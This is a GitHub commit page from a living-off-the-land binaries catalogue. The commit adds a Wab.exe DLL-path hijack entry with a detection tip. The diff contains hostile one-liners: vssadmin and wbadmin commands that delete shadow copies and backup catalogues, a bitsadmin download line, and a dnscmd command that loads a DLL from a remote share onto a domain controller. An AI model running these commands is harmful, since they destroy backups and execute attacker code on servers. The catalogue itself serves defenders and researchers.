Skip to content
This repository has been archived by the owner. It is now read-only.
Permalink
Browse files

Cleaning and adding Wab.exe

  • Loading branch information...
Oddvar Moe
Oddvar Moe committed May 9, 2018
1 parent 8b1e87b commit 118c337dfb9cf88152a1c82448cffdb37a71681f
Showing with 50 additions and 67 deletions.
  1. +2 −1 Backlog.txt
  2. +1 −2 LOLBins.md
  3. +5 −1 OSBinaries/Dnscmd.md
  4. +0 −31 OSBinaries/Qprocess.md
  5. +0 −30 OSBinaries/Regini.md
  6. +38 −0 OSBinaries/Wab.md
  7. +4 −2 OtherMSBinaries/Sqldumper.md
@@ -3,7 +3,6 @@ Kd.exe Debugger
Certreq.exe Exfiltrate data
Dbghost.exe
Robocopy.exe Needs examples
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
wbadmin.exe wbadmin delete catalog -quiet
@@ -15,3 +14,5 @@ WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a7
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
https://twitter.com/Hexacorn/status/993498264497541120
https://twitter.com/Hexacorn/status/994000792628719618
https://github.com/MoooKitty/Code-Execution
@@ -46,12 +46,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Presentationhost.exe](OSBinaries/Presentationhost.md)
[Print.exe](OSBinaries/Print.md)
[Psr.exe](OSBinaries/Psr.md)
[Qprocess.exe](OSBinaries/Qprocess.md)
[Reg.exe](OSBinaries/Reg.md)
[Regedit.exe](OSBinaries/Regedit.md)
[Regasm.exe](OSBinaries/Regasm.md)
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
[Regini.exe](OSBinaries/Regini.md)
[Regsvcs.exe](OSBinaries/Regsvcs.md)
[Regsvr32.exe](OSBinaries/Regsvr32.md)
[Replace.exe](OSBinaries/Replace.md)
@@ -63,6 +61,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Sc.exe](OSBinaries/Sc.md)
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
[Wab.exe](OSBinaries/Wab.md)
[Wmic.exe](OSBinaries/Wmic.md)
[Wscript.exe](OSBinaries/Wscript.md)
[Xwizard.exe](OSBinaries/Xwizard.md)
@@ -7,15 +7,19 @@ dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
```

Acknowledgements:
* Dimitrios Slamaris - @dim0x69
* Shay Ber - ?
* Dimitrios Slamaris - @dim0x69
* Nikhil SamratAshok Mittal - @nikhil_mitt

Code sample:
*

Resources:
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
* https://twitter.com/Hexacorn/status/994000792628719618
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html

Full path:
```

This file was deleted.

Oops, something went wrong.

This file was deleted.

Oops, something went wrong.
@@ -0,0 +1,38 @@
## Wab.exe

* Functions: Execute

```
Wab.exe (requires registry changes)
```

Acknowledgements:
* Adam - @Hexacorn

Code sample:
*

Resources:
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
* https://twitter.com/Hexacorn/status/991447379864932352

Full path:
```
C:\Program Files\Windows Mail\wab.exe
C:\Program Files (x86)\Windows Mail\wab.exe
```

Notes:
Searches for wab.dll. Can be manipulated with the following registry key:
```
HKLM\Software\Microsoft\WAB\DLLPath
```

Binary is used to manage Windows contacts/wab files. (Legacy)


Detection:
Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath



@@ -21,11 +21,13 @@ Resources:

Full path:
```
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
```

Notes:

Part of SQL server, but also Office in some versions.



0 comments on commit 118c337

Please sign in to comment.
You can’t perform that action at this time.